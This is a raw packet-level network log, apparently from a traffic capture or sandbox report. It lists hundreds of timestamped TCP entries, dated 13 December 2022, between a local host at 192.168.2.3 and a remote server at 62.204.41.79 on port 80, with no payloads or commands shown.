                                              Dec 13, 2022 20:09:17.565959930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.565977097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.566533089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.566566944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.566589117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.566612005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.567071915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.567101002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.567250967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.567275047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.567296982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.567318916 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.567620039 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.567657948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.568181038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.568212032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.568509102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.568572998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.568856955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.568933964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.569753885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.569786072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.569809914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.579123020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.579163074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.579185963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.579210997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.579233885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.579257011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.579303980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.579488039 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.579554081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.582560062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.582603931 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.582629919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.582654953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.582679987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.582704067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.582755089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.582940102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.582982063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.583200932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.583234072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.583854914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.583970070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.584146976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.584265947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.584379911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.584467888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.584525108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.584553957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.584568977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.584701061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.584789038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.584887981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.584981918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.585081100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.585093975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.585125923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.585150957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.585177898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.585195065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.585208893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.585231066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.585632086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.585664034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.585686922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.585707903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.585727930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.586158991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.586188078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.586678982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.586709023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.587085009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.587116003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.587321043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.587387085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.587426901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.587559938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.587671041 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.587740898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.589272022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.589349031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.589426041 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.589653015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.589660883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.589683056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.589829922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.589831114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.589932919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.589965105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.589994907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.590045929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.590070009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.590293884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.590306044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.590328932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.590444088 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.590475082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.590898991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.590935946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.591067076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.591197968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.591388941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.591520071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.591639996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.591757059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.591880083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.595417023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.595987082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.596028090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.596493959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.596537113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597095013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597198963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597239017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597275972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597284079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597302914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597313881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597476006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597490072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597518921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597556114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597589970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597621918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597784996 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.597820044 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.598160982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.598401070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.598798990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.599128008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.599159956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.599184990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.599206924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.599335909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.599792004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.599875927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.599994898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.600063086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.600862026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.601444006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.602309942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.602478981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.602600098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.602701902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.602811098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.602910995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.603001118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.603027105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.603053093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.603074074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.603096008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.603116035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.603346109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.603461027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.603564024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.603671074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.603774071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.603880882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.603984118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.604110003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.604240894 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.604439020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.604546070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.604657888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.604759932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.604873896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.604986906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.605113983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.605206013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.605330944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.605428934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.605525970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.605639935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.605719090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.605830908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.605916977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606014967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606112003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606208086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606302977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606400967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606498003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606595039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606687069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606784105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606872082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.606971979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.607058048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.607238054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.607523918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.607810974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.607939959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.608086109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.608181953 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.608282089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.608370066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.608472109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.608606100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.608659983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.608774900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.608971119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.609000921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.609071970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.609333992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.609365940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.609541893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.609589100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.609678984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.609806061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.609925985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.610048056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.610166073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.610239983 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.610457897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.610564947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.610637903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.610816002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.610940933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.611099958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.611140013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.611303091 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.611358881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.611439943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.626230955 CET4974680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.627432108 CET4974780192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.627449989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.627583981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.627970934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.628093004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.628206968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.628364086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.628473043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.628619909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.628722906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.628870964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.628962040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629048109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629144907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629228115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629322052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629406929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629498959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629585028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629678011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629761934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629853964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.629941940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.630038977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.630248070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.630335093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.630445957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.630538940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.630639076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.630724907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.630819082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.631083965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.631194115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.631505013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.631637096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.631763935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.632044077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.634358883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.634510994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.646230936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.646274090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.646301031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.646322012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.646341085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.646363020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.650938988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.650985956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.651010990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.651034117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.651231050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.651257038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.652283907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.652316093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.652338982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.652371883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.652482033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.652594090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.652702093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.663089037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.663139105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.663182020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.663333893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.663461924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.663872004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.663969994 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.664100885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.664125919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.664256096 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.664683104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.666107893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667351961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667488098 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667515993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667537928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667560101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667583942 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667604923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667628050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667650938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667670965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667695045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667716980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667740107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667761087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667783022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667804956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667826891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667849064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667870998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667891979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667913914 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667936087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667958021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667979956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.667999029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.668023109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.668045998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.668065071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.668236017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.668540955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.668943882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.668976068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.669086933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.669112921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.669190884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.669328928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.669353008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.669615984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.669642925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.673768044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.674005985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.686011076 CET804974662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.686111927 CET4974680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.688014030 CET804974762.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.688086987 CET4974780192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:17.688110113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.688134909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.688455105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.688647032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.688842058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.688869953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.689028025 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.689228058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.689254045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.689407110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.689435959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.689600945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.689630032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.689788103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.689816952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:17.690031052 CET804973662.204.41.79192.168.2.3
